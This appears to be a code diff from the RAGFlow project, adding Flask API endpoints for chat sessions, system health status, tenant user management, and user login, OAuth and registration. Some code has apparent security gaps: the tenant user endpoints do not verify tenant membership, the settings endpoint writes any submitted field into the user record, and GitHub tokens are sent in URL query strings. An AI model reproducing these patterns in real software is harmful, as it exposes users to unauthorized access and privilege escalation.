return get_data_error_result(retmsg="Index updating failure")
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
deleted_chunk_ids = req["chunk_ids"]
|
||||
chunk_number = len(deleted_chunk_ids)
|
||||
DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
263
api/apps/sdk/session.py
Normal file
263
api/apps/sdk/session.py
Normal file
@ -0,0 +1,263 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import json
|
||||
from uuid import uuid4
|
||||
|
||||
from flask import request, Response
|
||||
|
||||
from api.db import StatusEnum
|
||||
from api.db.services.dialog_service import DialogService, ConversationService, chat
|
||||
from api.settings import RetCode
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_data_error_result
|
||||
from api.utils.api_utils import get_json_result, token_required
|
||||
|
||||
|
||||
@manager.route('/save', methods=['POST'])
|
||||
@token_required
|
||||
def set_conversation(tenant_id):
|
||||
req = request.json
|
||||
conv_id = req.get("id")
|
||||
if "assistant_id" in req:
|
||||
req["dialog_id"] = req.pop("assistant_id")
|
||||
if "id" in req:
|
||||
del req["id"]
|
||||
conv = ConversationService.query(id=conv_id)
|
||||
if not conv:
|
||||
return get_data_error_result(retmsg="Session does not exist")
|
||||
if not DialogService.query(id=conv[0].dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
|
||||
return get_data_error_result(retmsg="You do not own the session")
|
||||
if req.get("dialog_id"):
|
||||
dia = DialogService.query(tenant_id=tenant_id, id=req["dialog_id"], status=StatusEnum.VALID.value)
|
||||
if not dia:
|
||||
return get_data_error_result(retmsg="You do not own the assistant")
|
||||
if "dialog_id" in req and not req.get("dialog_id"):
|
||||
return get_data_error_result(retmsg="assistant_id can not be empty.")
|
||||
if "message" in req:
|
||||
return get_data_error_result(retmsg="message can not be change")
|
||||
if "reference" in req:
|
||||
return get_data_error_result(retmsg="reference can not be change")
|
||||
if "name" in req and not req.get("name"):
|
||||
return get_data_error_result(retmsg="name can not be empty.")
|
||||
if not ConversationService.update_by_id(conv_id, req):
|
||||
return get_data_error_result(retmsg="Session updates error")
|
||||
return get_json_result(data=True)
|
||||
|
||||
if not req.get("dialog_id"):
|
||||
return get_data_error_result(retmsg="assistant_id is required.")
|
||||
dia = DialogService.query(tenant_id=tenant_id, id=req["dialog_id"], status=StatusEnum.VALID.value)
|
||||
if not dia:
|
||||
return get_data_error_result(retmsg="You do not own the assistant")
|
||||
conv = {
|
||||
"id": get_uuid(),
|
||||
"dialog_id": req["dialog_id"],
|
||||
"name": req.get("name", "New session"),
|
||||
"message": [{"role": "assistant", "content": "Hi! I am your assistant,can I help you?"}]
|
||||
}
|
||||
if not conv.get("name"):
|
||||
return get_data_error_result(retmsg="name can not be empty.")
|
||||
ConversationService.save(**conv)
|
||||
e, conv = ConversationService.get_by_id(conv["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to new session!")
|
||||
conv = conv.to_dict()
|
||||
conv['messages'] = conv.pop("message")
|
||||
conv["assistant_id"] = conv.pop("dialog_id")
|
||||
del conv["reference"]
|
||||
return get_json_result(data=conv)
|
||||
|
||||
|
||||
@manager.route('/completion', methods=['POST'])
|
||||
@token_required
|
||||
def completion(tenant_id):
|
||||
req = request.json
|
||||
# req = {"conversation_id": "9aaaca4c11d311efa461fa163e197198", "messages": [
|
||||
# {"role": "user", "content": "上海有吗?"}
|
||||
# ]}
|
||||
if "id" not in req:
|
||||
return get_data_error_result(retmsg="id is required")
|
||||
conv = ConversationService.query(id=req["id"])
|
||||
if not conv:
|
||||
return get_data_error_result(retmsg="Session does not exist")
|
||||
conv = conv[0]
|
||||
if not DialogService.query(id=conv.dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
|
||||
return get_data_error_result(retmsg="You do not own the session")
|
||||
msg = []
|
||||
question = {
|
||||
"content": req.get("question"),
|
||||
"role": "user",
|
||||
"id": str(uuid4())
|
||||
}
|
||||
conv.message.append(question)
|
||||
for m in conv.message:
|
||||
if m["role"] == "system": continue
|
||||
if m["role"] == "assistant" and not msg: continue
|
||||
msg.append(m)
|
||||
message_id = msg[-1].get("id")
|
||||
e, dia = DialogService.get_by_id(conv.dialog_id)
|
||||
del req["id"]
|
||||
|
||||
if not conv.reference:
|
||||
conv.reference = []
|
||||
conv.message.append({"role": "assistant", "content": "", "id": message_id})
|
||||
conv.reference.append({"chunks": [], "doc_aggs": []})
|
||||
|
||||
def fillin_conv(ans):
|
||||
nonlocal conv, message_id
|
||||
if not conv.reference:
|
||||
conv.reference.append(ans["reference"])
|
||||
else:
|
||||
conv.reference[-1] = ans["reference"]
|
||||
conv.message[-1] = {"role": "assistant", "content": ans["answer"],
|
||||
"id": message_id, "prompt": ans.get("prompt", "")}
|
||||
ans["id"] = message_id
|
||||
|
||||
def stream():
|
||||
nonlocal dia, msg, req, conv
|
||||
try:
|
||||
for ans in chat(dia, msg, **req):
|
||||
fillin_conv(ans)
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
if req.get("stream", True):
|
||||
resp = Response(stream(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
else:
|
||||
answer = None
|
||||
for ans in chat(dia, msg, **req):
|
||||
answer = ans
|
||||
fillin_conv(ans)
|
||||
ConversationService.update_by_id(conv.id, conv.to_dict())
|
||||
break
|
||||
return get_json_result(data=answer)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@token_required
|
||||
def get(tenant_id):
|
||||
req = request.args
|
||||
if "id" not in req:
|
||||
return get_data_error_result(retmsg="id is required")
|
||||
conv_id = req["id"]
|
||||
conv = ConversationService.query(id=conv_id)
|
||||
if not conv:
|
||||
return get_data_error_result(retmsg="Session does not exist")
|
||||
if not DialogService.query(id=conv[0].dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
|
||||
return get_data_error_result(retmsg="You do not own the session")
|
||||
conv = conv[0].to_dict()
|
||||
conv['messages'] = conv.pop("message")
|
||||
conv["assistant_id"] = conv.pop("dialog_id")
|
||||
if conv["reference"]:
|
||||
messages = conv["messages"]
|
||||
message_num = 0
|
||||
chunk_num = 0
|
||||
while message_num < len(messages):
|
||||
if message_num != 0 and messages[message_num]["role"] != "user":
|
||||
chunk_list = []
|
||||
if "chunks" in conv["reference"][chunk_num]:
|
||||
chunks = conv["reference"][chunk_num]["chunks"]
|
||||
for chunk in chunks:
|
||||
new_chunk = {
|
||||
"id": chunk["chunk_id"],
|
||||
"content": chunk["content_with_weight"],
|
||||
"document_id": chunk["doc_id"],
|
||||
"document_name": chunk["docnm_kwd"],
|
||||
"knowledgebase_id": chunk["kb_id"],
|
||||
"image_id": chunk["img_id"],
|
||||
"similarity": chunk["similarity"],
|
||||
"vector_similarity": chunk["vector_similarity"],
|
||||
"term_similarity": chunk["term_similarity"],
|
||||
"positions": chunk["positions"],
|
||||
}
|
||||
chunk_list.append(new_chunk)
|
||||
chunk_num += 1
|
||||
messages[message_num]["reference"] = chunk_list
|
||||
message_num += 1
|
||||
del conv["reference"]
|
||||
return get_json_result(data=conv)
|
||||
|
||||
|
||||
@manager.route('/list', methods=["GET"])
|
||||
@token_required
|
||||
def list(tenant_id):
|
||||
assistant_id = request.args["assistant_id"]
|
||||
if not DialogService.query(tenant_id=tenant_id, id=assistant_id, status=StatusEnum.VALID.value):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of the assistant is authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
convs = ConversationService.query(
|
||||
dialog_id=assistant_id,
|
||||
order_by=ConversationService.model.create_time,
|
||||
reverse=True)
|
||||
convs = [d.to_dict() for d in convs]
|
||||
for conv in convs:
|
||||
conv['messages'] = conv.pop("message")
|
||||
conv["assistant_id"] = conv.pop("dialog_id")
|
||||
if conv["reference"]:
|
||||
messages = conv["messages"]
|
||||
message_num = 0
|
||||
chunk_num = 0
|
||||
while message_num < len(messages):
|
||||
if message_num != 0 and messages[message_num]["role"] != "user":
|
||||
chunk_list = []
|
||||
if "chunks" in conv["reference"][chunk_num]:
|
||||
chunks = conv["reference"][chunk_num]["chunks"]
|
||||
for chunk in chunks:
|
||||
new_chunk = {
|
||||
"id": chunk["chunk_id"],
|
||||
"content": chunk["content_with_weight"],
|
||||
"document_id": chunk["doc_id"],
|
||||
"document_name": chunk["docnm_kwd"],
|
||||
"knowledgebase_id": chunk["kb_id"],
|
||||
"image_id": chunk["img_id"],
|
||||
"similarity": chunk["similarity"],
|
||||
"vector_similarity": chunk["vector_similarity"],
|
||||
"term_similarity": chunk["term_similarity"],
|
||||
"positions": chunk["positions"],
|
||||
}
|
||||
chunk_list.append(new_chunk)
|
||||
chunk_num += 1
|
||||
messages[message_num]["reference"] = chunk_list
|
||||
message_num += 1
|
||||
del conv["reference"]
|
||||
return get_json_result(data=convs)
|
||||
|
||||
|
||||
@manager.route('/delete', methods=["DELETE"])
|
||||
@token_required
|
||||
def delete(tenant_id):
|
||||
id = request.args.get("id")
|
||||
if not id:
|
||||
return get_data_error_result(retmsg="`id` is required in deleting operation")
|
||||
conv = ConversationService.query(id=id)
|
||||
if not conv:
|
||||
return get_data_error_result(retmsg="Session doesn't exist")
|
||||
conv = conv[0]
|
||||
if not DialogService.query(id=conv.dialog_id, tenant_id=tenant_id, status=StatusEnum.VALID.value):
|
||||
return get_data_error_result(retmsg="You don't own the session")
|
||||
ConversationService.delete_by_id(id)
|
||||
return get_json_result(data=True)
|
||||
@ -13,6 +13,8 @@
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License
|
||||
#
|
||||
import json
|
||||
|
||||
from flask_login import login_required
|
||||
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
@ -20,7 +22,7 @@ from api.utils.api_utils import get_json_result
|
||||
from api.versions import get_rag_version
|
||||
from rag.settings import SVR_QUEUE_NAME
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from rag.utils.storage_factory import STORAGE_IMPL
|
||||
from timeit import default_timer as timer
|
||||
|
||||
from rag.utils.redis_conn import REDIS_CONN
|
||||
@ -45,7 +47,7 @@ def status():
|
||||
|
||||
st = timer()
|
||||
try:
|
||||
MINIO.health()
|
||||
STORAGE_IMPL.health()
|
||||
res["minio"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
|
||||
except Exception as e:
|
||||
res["minio"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
|
||||
@ -59,9 +61,29 @@ def status():
|
||||
|
||||
st = timer()
|
||||
try:
|
||||
qinfo = REDIS_CONN.health(SVR_QUEUE_NAME)
|
||||
res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.), "pending": qinfo["pending"]}
|
||||
if not REDIS_CONN.health():
|
||||
raise Exception("Lost connection!")
|
||||
res["redis"] = {"status": "green", "elapsed": "{:.1f}".format((timer() - st)*1000.)}
|
||||
except Exception as e:
|
||||
res["redis"] = {"status": "red", "elapsed": "{:.1f}".format((timer() - st)*1000.), "error": str(e)}
|
||||
|
||||
try:
|
||||
v = REDIS_CONN.get("TASKEXE")
|
||||
if not v:
|
||||
raise Exception("No task executor running!")
|
||||
obj = json.loads(v)
|
||||
color = "green"
|
||||
for id in obj.keys():
|
||||
arr = obj[id]
|
||||
if len(arr) == 1:
|
||||
obj[id] = [0]
|
||||
else:
|
||||
obj[id] = [arr[i+1]-arr[i] for i in range(len(arr)-1)]
|
||||
elapsed = max(obj[id])
|
||||
if elapsed > 50: color = "yellow"
|
||||
if elapsed > 120: color = "red"
|
||||
res["task_executor"] = {"status": color, "elapsed": obj}
|
||||
except Exception as e:
|
||||
res["task_executor"] = {"status": "red", "error": str(e)}
|
||||
|
||||
return get_json_result(data=res)
|
||||
|
||||
85
api/apps/tenant_app.py
Normal file
85
api/apps/tenant_app.py
Normal file
@ -0,0 +1,85 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
|
||||
from flask import request
|
||||
from flask_login import current_user, login_required
|
||||
|
||||
from api.db import UserTenantRole, StatusEnum
|
||||
from api.db.db_models import UserTenant
|
||||
from api.db.services.user_service import TenantService, UserTenantService
|
||||
from api.settings import RetCode
|
||||
|
||||
from api.utils import get_uuid
|
||||
from api.utils.api_utils import get_json_result, validate_request, server_error_response
|
||||
|
||||
|
||||
@manager.route("/list", methods=["GET"])
|
||||
@login_required
|
||||
def tenant_list():
|
||||
try:
|
||||
tenants = TenantService.get_by_user_id(current_user.id)
|
||||
return get_json_result(data=tenants)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route("/<tenant_id>/user/list", methods=["GET"])
|
||||
@login_required
|
||||
def user_list(tenant_id):
|
||||
try:
|
||||
users = UserTenantService.get_by_tenant_id(tenant_id)
|
||||
return get_json_result(data=users)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/<tenant_id>/user', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("user_id")
|
||||
def create(tenant_id):
|
||||
user_id = request.json.get("user_id")
|
||||
if not user_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "USER ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
user_tenants = UserTenantService.query(user_id=user_id, tenant_id=tenant_id)
|
||||
if user_tenants:
|
||||
uuid = user_tenants[0].id
|
||||
return get_json_result(data={"id": uuid})
|
||||
|
||||
uuid = get_uuid()
|
||||
UserTenantService.save(
|
||||
id = uuid,
|
||||
user_id = user_id,
|
||||
tenant_id = tenant_id,
|
||||
role = UserTenantRole.NORMAL.value,
|
||||
status = StatusEnum.VALID.value)
|
||||
|
||||
return get_json_result(data={"id": uuid})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/<tenant_id>/user/<user_id>', methods=['DELETE'])
|
||||
@login_required
|
||||
def rm(tenant_id, user_id):
|
||||
try:
|
||||
UserTenantService.filter_delete([UserTenant.tenant_id == tenant_id, UserTenant.user_id == user_id])
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
@ -1,388 +1,422 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import re
|
||||
from datetime import datetime
|
||||
|
||||
from flask import request, session, redirect
|
||||
from werkzeug.security import generate_password_hash, check_password_hash
|
||||
from flask_login import login_required, current_user, login_user, logout_user
|
||||
|
||||
from api.db.db_models import TenantLLM
|
||||
from api.db.services.llm_service import TenantLLMService, LLMService
|
||||
from api.utils.api_utils import server_error_response, validate_request
|
||||
from api.utils import get_uuid, get_format_time, decrypt, download_img, current_timestamp, datetime_format
|
||||
from api.db import UserTenantRole, LLMType, FileType
|
||||
from api.settings import RetCode, GITHUB_OAUTH, CHAT_MDL, EMBEDDING_MDL, ASR_MDL, IMAGE2TEXT_MDL, PARSERS, API_KEY, \
|
||||
LLM_FACTORY, LLM_BASE_URL
|
||||
from api.db.services.user_service import UserService, TenantService, UserTenantService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.settings import stat_logger
|
||||
from api.utils.api_utils import get_json_result, cors_reponse
|
||||
|
||||
|
||||
@manager.route('/login', methods=['POST', 'GET'])
|
||||
def login():
|
||||
login_channel = "password"
|
||||
if not request.json:
|
||||
return get_json_result(data=False, retcode=RetCode.AUTHENTICATION_ERROR,
|
||||
retmsg='Unautherized!')
|
||||
|
||||
email = request.json.get('email', "")
|
||||
users = UserService.query(email=email)
|
||||
if not users:
|
||||
return get_json_result(
|
||||
data=False, retcode=RetCode.AUTHENTICATION_ERROR, retmsg=f'This Email is not registered!')
|
||||
|
||||
password = request.json.get('password')
|
||||
try:
|
||||
password = decrypt(password)
|
||||
except BaseException:
|
||||
return get_json_result(
|
||||
data=False, retcode=RetCode.SERVER_ERROR, retmsg='Fail to crypt password')
|
||||
|
||||
user = UserService.query_user(email, password)
|
||||
if user:
|
||||
response_data = user.to_json()
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.update_time = current_timestamp(),
|
||||
user.update_date = datetime_format(datetime.now()),
|
||||
user.save()
|
||||
msg = "Welcome back!"
|
||||
return cors_reponse(data=response_data, auth=user.get_id(), retmsg=msg)
|
||||
else:
|
||||
return get_json_result(data=False, retcode=RetCode.AUTHENTICATION_ERROR,
|
||||
retmsg='Email and Password do not match!')
|
||||
|
||||
|
||||
@manager.route('/github_callback', methods=['GET'])
|
||||
def github_callback():
|
||||
import requests
|
||||
res = requests.post(GITHUB_OAUTH.get("url"), data={
|
||||
"client_id": GITHUB_OAUTH.get("client_id"),
|
||||
"client_secret": GITHUB_OAUTH.get("secret_key"),
|
||||
"code": request.args.get('code')
|
||||
}, headers={"Accept": "application/json"})
|
||||
res = res.json()
|
||||
if "error" in res:
|
||||
return redirect("/?error=%s" % res["error_description"])
|
||||
|
||||
if "user:email" not in res["scope"].split(","):
|
||||
return redirect("/?error=user:email not in scope")
|
||||
|
||||
session["access_token"] = res["access_token"]
|
||||
session["access_token_from"] = "github"
|
||||
userinfo = user_info_from_github(session["access_token"])
|
||||
users = UserService.query(email=userinfo["email"])
|
||||
user_id = get_uuid()
|
||||
if not users:
|
||||
try:
|
||||
try:
|
||||
avatar = download_img(userinfo["avatar_url"])
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
avatar = ""
|
||||
users = user_register(user_id, {
|
||||
"access_token": session["access_token"],
|
||||
"email": userinfo["email"],
|
||||
"avatar": avatar,
|
||||
"nickname": userinfo["login"],
|
||||
"login_channel": "github",
|
||||
"last_login_time": get_format_time(),
|
||||
"is_superuser": False,
|
||||
})
|
||||
if not users:
|
||||
raise Exception('Register user failure.')
|
||||
if len(users) > 1:
|
||||
raise Exception('Same E-mail exist!')
|
||||
user = users[0]
|
||||
login_user(user)
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
except Exception as e:
|
||||
rollback_user_registration(user_id)
|
||||
stat_logger.exception(e)
|
||||
return redirect("/?error=%s" % str(e))
|
||||
user = users[0]
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.save()
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
|
||||
|
||||
@manager.route('/feishu_callback', methods=['GET'])
|
||||
def feishu_callback():
|
||||
import requests
|
||||
app_access_token_res = requests.post(FEISHU_OAUTH.get("app_access_token_url"), data=json.dumps({
|
||||
"app_id": FEISHU_OAUTH.get("app_id"),
|
||||
"app_secret": FEISHU_OAUTH.get("app_secret")
|
||||
}), headers={"Content-Type": "application/json; charset=utf-8"})
|
||||
app_access_token_res = app_access_token_res.json()
|
||||
if app_access_token_res['code'] != 0:
|
||||
return redirect("/?error=%s" % app_access_token_res)
|
||||
|
||||
res = requests.post(FEISHU_OAUTH.get("user_access_token_url"), data=json.dumps({
|
||||
"grant_type": FEISHU_OAUTH.get("grant_type"),
|
||||
"code": request.args.get('code')
|
||||
}), headers={"Content-Type": "application/json; charset=utf-8",
|
||||
'Authorization': f"Bearer {app_access_token_res['app_access_token']}"})
|
||||
res = res.json()
|
||||
if res['code'] != 0:
|
||||
return redirect("/?error=%s" % res["message"])
|
||||
|
||||
if "contact:user.email:readonly" not in res["data"]["scope"].split(" "):
|
||||
return redirect("/?error=contact:user.email:readonly not in scope")
|
||||
session["access_token"] = res["data"]["access_token"]
|
||||
session["access_token_from"] = "feishu"
|
||||
userinfo = user_info_from_feishu(session["access_token"])
|
||||
users = UserService.query(email=userinfo["email"])
|
||||
user_id = get_uuid()
|
||||
if not users:
|
||||
try:
|
||||
try:
|
||||
avatar = download_img(userinfo["avatar_url"])
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
avatar = ""
|
||||
users = user_register(user_id, {
|
||||
"access_token": session["access_token"],
|
||||
"email": userinfo["email"],
|
||||
"avatar": avatar,
|
||||
"nickname": userinfo["en_name"],
|
||||
"login_channel": "feishu",
|
||||
"last_login_time": get_format_time(),
|
||||
"is_superuser": False,
|
||||
})
|
||||
if not users:
|
||||
raise Exception('Register user failure.')
|
||||
if len(users) > 1:
|
||||
raise Exception('Same E-mail exist!')
|
||||
user = users[0]
|
||||
login_user(user)
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
except Exception as e:
|
||||
rollback_user_registration(user_id)
|
||||
stat_logger.exception(e)
|
||||
return redirect("/?error=%s" % str(e))
|
||||
user = users[0]
|
||||
user.access_token = get_uuid()
|
||||
login_user(user)
|
||||
user.save()
|
||||
return redirect("/?auth=%s" % user.get_id())
|
||||
|
||||
|
||||
def user_info_from_feishu(access_token):
|
||||
import requests
|
||||
headers = {"Content-Type": "application/json; charset=utf-8",
|
||||
'Authorization': f"Bearer {access_token}"}
|
||||
res = requests.get(
|
||||
f"https://open.feishu.cn/open-apis/authen/v1/user_info",
|
||||
headers=headers)
|
||||
user_info = res.json()["data"]
|
||||
user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
|
||||
return user_info
|
||||
|
||||
|
||||
def user_info_from_github(access_token):
|
||||
import requests
|
||||
headers = {"Accept": "application/json",
|
||||
'Authorization': f"token {access_token}"}
|
||||
res = requests.get(
|
||||
f"https://api.github.com/user?access_token={access_token}",
|
||||
headers=headers)
|
||||
user_info = res.json()
|
||||
email_info = requests.get(
|
||||
f"https://api.github.com/user/emails?access_token={access_token}",
|
||||
headers=headers).json()
|
||||
user_info["email"] = next(
|
||||
(email for email in email_info if email['primary'] == True),
|
||||
None)["email"]
|
||||
return user_info
|
||||
|
||||
|
||||
@manager.route("/logout", methods=['GET'])
|
||||
@login_required
|
||||
def log_out():
|
||||
current_user.access_token = ""
|
||||
current_user.save()
|
||||
logout_user()
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route("/setting", methods=["POST"])
|
||||
@login_required
|
||||
def setting_user():
|
||||
update_dict = {}
|
||||
request_data = request.json
|
||||
if request_data.get("password"):
|
||||
new_password = request_data.get("new_password")
|
||||
if not check_password_hash(
|
||||
current_user.password, decrypt(request_data["password"])):
|
||||
return get_json_result(
|
||||
data=False, retcode=RetCode.AUTHENTICATION_ERROR, retmsg='Password error!')
|
||||
|
||||
if new_password:
|
||||
update_dict["password"] = generate_password_hash(
|
||||
decrypt(new_password))
|
||||
|
||||
for k in request_data.keys():
|
||||
if k in ["password", "new_password"]:
|
||||
continue
|
||||
update_dict[k] = request_data[k]
|
||||
|
||||
try:
|
||||
UserService.update_by_id(current_user.id, update_dict)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
stat_logger.exception(e)
|
||||
return get_json_result(
|
||||
data=False, retmsg='Update failure!', retcode=RetCode.EXCEPTION_ERROR)
|
||||
|
||||
|
||||
@manager.route("/info", methods=["GET"])
|
||||
@login_required
|
||||
def user_info():
|
||||
return get_json_result(data=current_user.to_dict())
|
||||
|
||||
|
||||
def rollback_user_registration(user_id):
|
||||
try:
|
||||
UserService.delete_by_id(user_id)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
TenantService.delete_by_id(user_id)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
u = UserTenantService.query(tenant_id=user_id)
|
||||
if u:
|
||||
UserTenantService.delete_by_id(u[0].id)
|
||||
except Exception as e:
|
||||
pass
|
||||
try:
|
||||
TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
|
||||
except Exception as e:
|
||||
pass
|
||||
|
||||
|
||||
def user_register(user_id, user):
|
||||
user["id"] = user_id
|
||||
tenant = {
|
||||
"id": user_id,
|
||||
"name": user["nickname"] + "‘s Kingdom",
|
||||
"llm_id": CHAT_MDL,
|
||||
"embd_id": EMBEDDING_MDL,
|
||||
"asr_id": ASR_MDL,
|
||||
"parser_ids": PARSERS,
|
||||
"img2txt_id": IMAGE2TEXT_MDL
|
||||
}
|
||||
usr_tenant = {
|
||||
"tenant_id": user_id,
|
||||
"user_id": user_id,
|
||||
"invited_by": user_id,
|
||||
"role": UserTenantRole.OWNER
|
||||
}
|
||||
file_id = get_uuid()
|
||||
file = {
|
||||
"id": file_id,
|
||||
"parent_id": file_id,
|
||||
"tenant_id": user_id,
|
||||
"created_by": user_id,
|
||||
"name": "/",
|
||||
"type": FileType.FOLDER.value,
|
||||
"size": 0,
|
||||
"location": "",
|
||||
}
|
||||
tenant_llm = []
|
||||
for llm in LLMService.query(fid=LLM_FACTORY):
|
||||
tenant_llm.append({"tenant_id": user_id,
|
||||
"llm_factory": LLM_FACTORY,
|
||||
"llm_name": llm.llm_name,
|
||||
"model_type": llm.model_type,
|
||||
"api_key": API_KEY,
|
||||
"api_base": LLM_BASE_URL
|
||||
})
|
||||
|
||||
if not UserService.save(**user):
|
||||
return
|
||||
TenantService.insert(**tenant)
|
||||
UserTenantService.insert(**usr_tenant)
|
||||
TenantLLMService.insert_many(tenant_llm)
|
||||
FileService.insert(file)
|
||||
return UserService.query(email=user["email"])
|
||||
|
||||
|
||||
@manager.route("/register", methods=["POST"])
|
||||
@validate_request("nickname", "email", "password")
|
||||
def user_add():
|
||||
req = request.json
|
||||
if UserService.query(email=req["email"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Email: {req["email"]} has already registered!', retcode=RetCode.OPERATING_ERROR)
|
||||
if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,4}$", req["email"]):
|
||||
return get_json_result(data=False, retmsg=f'Invaliad e-mail: {req["email"]}!',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
user_dict = {
|
||||
"access_token": get_uuid(),
|
||||
"email": req["email"],
|
||||
"nickname": req["nickname"],
|
||||
"password": decrypt(req["password"]),
|
||||
"login_channel": "password",
|
||||
"last_login_time": get_format_time(),
|
||||
"is_superuser": False,
|
||||
}
|
||||
|
||||
user_id = get_uuid()
|
||||
try:
|
||||
users = user_register(user_id, user_dict)
|
||||
if not users:
|
||||
raise Exception('Register user failure.')
|
||||
if len(users) > 1:
|
||||
raise Exception('Same E-mail exist!')
|
||||
user = users[0]
|
||||
login_user(user)
|
||||
return cors_reponse(data=user.to_json(),
|
||||
auth=user.get_id(), retmsg="Welcome aboard!")
|
||||
except Exception as e:
|
||||
rollback_user_registration(user_id)
|
||||
stat_logger.exception(e)
|
||||
return get_json_result(
|
||||
data=False, retmsg='User registration failure!', retcode=RetCode.EXCEPTION_ERROR)
|
||||
|
||||
|
||||
@manager.route("/tenant_info", methods=["GET"])
|
||||
@login_required
|
||||
def tenant_info():
|
||||
try:
|
||||
tenants = TenantService.get_by_user_id(current_user.id)[0]
|
||||
return get_json_result(data=tenants)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route("/set_tenant_info", methods=["POST"])
|
||||
@login_required
|
||||
@validate_request("tenant_id", "asr_id", "embd_id", "img2txt_id", "llm_id")
|
||||
def set_tenant_info():
|
||||
req = request.json
|
||||
try:
|
||||
tid = req["tenant_id"]
|
||||
del req["tenant_id"]
|
||||
TenantService.update_by_id(tid, req)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
